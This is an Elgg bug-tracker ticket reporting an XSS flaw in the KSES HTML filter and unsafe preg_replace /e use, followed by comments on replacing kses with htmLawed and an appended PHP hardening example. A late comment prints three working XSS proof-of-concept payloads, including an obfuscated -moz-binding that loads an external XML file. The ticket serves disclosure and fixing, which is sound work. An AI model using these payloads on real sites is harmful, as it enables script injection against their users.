Opened 4 years ago
Closed 4 years ago
#1086 closed Defect (fixed)
XSS Exploit in KSES filtered strings (Security issue in elgg 1.5)
| Reported by: | heyho | Owned by: | |
|---|---|---|---|
| Priority: | critical | Milestone: | Elgg 1.5 |
| Component: | Core | Version: | 1.5 |
| Severity: | critical | Keywords: | |
| Cc: | brettp | Difficulty: | |
Description
Hi,
An old XSS security issue affecting Kses still affects Elgg.
See:
http://www.securityfocus.com/bid/28599
http://downloads.securityfocus.com/vulnerabilities/exploits/28599.html
You can try these proofs of concept via the Elgg search engine.
Also, the kses lib makes many calls to preg_replace() using the /e modifier.
When preg_replace() is called with this modifier, the interpreter parses the replacement string as PHP code once for every replacement made.
Regards
Change History (9)
comment:1 Changed 4 years ago by marcus
comment:2 Changed 4 years ago by marcus
- Summary changed from Security issue in elgg 1.5 to XSS Exploit in KSES filtered strings (Security issue in elgg 1.5)
comment:3 Changed 4 years ago by marcus
(In [svn:3369]) Refs #1086: Fixes specific issues mentioned pending KSES fix / replacement
comment:4 Changed 4 years ago by brettp
(In [svn:3375]) Refs #1086: Added htmLawed plugin as replacement for kses.
comment:5 Changed 4 years ago by marcus
(In [svn:3376]) Refs #1086: Deprecating kses and removing it from core. Version bump.
comment:6 Changed 4 years ago by marcus
(In [svn:3381]) Refs #1086 & #1073: Filtering and captcha have correct install defaults.
comment:7 Changed 4 years ago by marcus
- Resolution set to fixed
- Status changed from new to closed
Closing as this appears to be fixed now.
comment:8 Changed 4 years ago by heyho
- Resolution fixed deleted
- Status changed from closed to reopened
Hi there,
Thanks for your support regarding this bug.
I would like to know where it has been committed?
"Latest version (v1.5) RELEASED MARCH 09"
still vulnerable.
Thanks
comment:9 Changed 4 years ago by brettp
- Resolution set to fixed
- Status changed from reopened to closed
It's committed in the latest SVN and will be available in the next release and in the nightly builds.

Confirmed that this issue is present on search results.
Pages which use output views are protected from the first FF exploit:
<a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
But not the second:
<a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)" href="http://example.com">test</a>
Unable to confirm the opera one:
<img src="%0Bjavascript:alert(document.domain)">
KSES is no longer being maintained as I have mentioned in other issues, therefore +1 for decommissioning it in favour of something that is... I don't want to be in the business of maintaining someone else's dead project.
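The two hardening points raised in this ticket (replacing kses-style preg_replace() /e calls with preg_replace_callback(), and normalising href/src values before the scheme check so that the leading %08 / %0B bytes in the proofs of concept above are caught), as an added PHP example that is not Elgg's, kses's or htmLawed's code; the entity regexes, the scheme allow-list and the sample inputs are assumptions.

```php
<?php
// Added example (not code from Elgg, kses, htmLawed or this ticket). Runs on PHP 7.4+.

// 1. Entity normalisation without preg_replace()'s /e modifier.
//    A kses-style filter of that era might have written (assumed, not kses's own line):
//      preg_replace('/&#0*([0-9]{1,5});/e', "'&#'.intval('\\1').';'", $s)
//    With /e the replacement string is evaluated as PHP once per match;
//    preg_replace_callback() evaluates nothing. (/e is a compile error on PHP 7+.)
function normalize_numeric_entities(string $s): string
{
    $s = preg_replace_callback(
        '/&#0*([0-9]{1,5});/',
        fn(array $m): string => '&#' . (int) $m[1] . ';',
        $s
    );
    return preg_replace_callback(
        '/&#[xX]0*([0-9a-fA-F]{1,5});/',
        fn(array $m): string => '&#x' . strtoupper(ltrim($m[1], '0') ?: '0') . ';',
        $s
    );
}

// 2. Scheme allow-listing for href/src values. The ticket's proofs of concept
//    prefix the URL with a backspace (%08) or vertical tab (%0B): a filter that
//    looks for "javascript:" or "data:" only at offset 0 misses them, while the
//    browser's URL parser discards the control character. Apply the same
//    pre-processing the URL Standard does (strip leading/trailing C0 controls
//    and spaces, drop tabs and newlines) before reading the scheme.
function is_allowed_url(string $url, array $allowed = ['http', 'https', 'mailto']): bool
{
    $url = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8'); // e.g. &#x6A;avascript:
    $url = str_replace(["\t", "\n", "\r"], '', $url);
    $url = trim($url, "\x00..\x20");
    if (!preg_match('/^([A-Za-z][A-Za-z0-9+.\-]*):/', $url, $m)) {
        return true; // no scheme: relative URL
    }
    return in_array(strtolower($m[1]), $allowed, true);
}

// Constructed inputs mirroring the shape of the ticket's proofs of concept.
$samples = [
    "\x08data:text/html,hello",
    "\x0Bjavascript:void(0)",
    "java\tscript:void(0)",
    "http://example.com/",
];
foreach ($samples as $u) {
    printf("%-40s %s\n", json_encode($u), is_allowed_url($u) ? 'allowed' : 'blocked');
}
echo normalize_numeric_entities('&#0065;&#x0041;'), "\n";
```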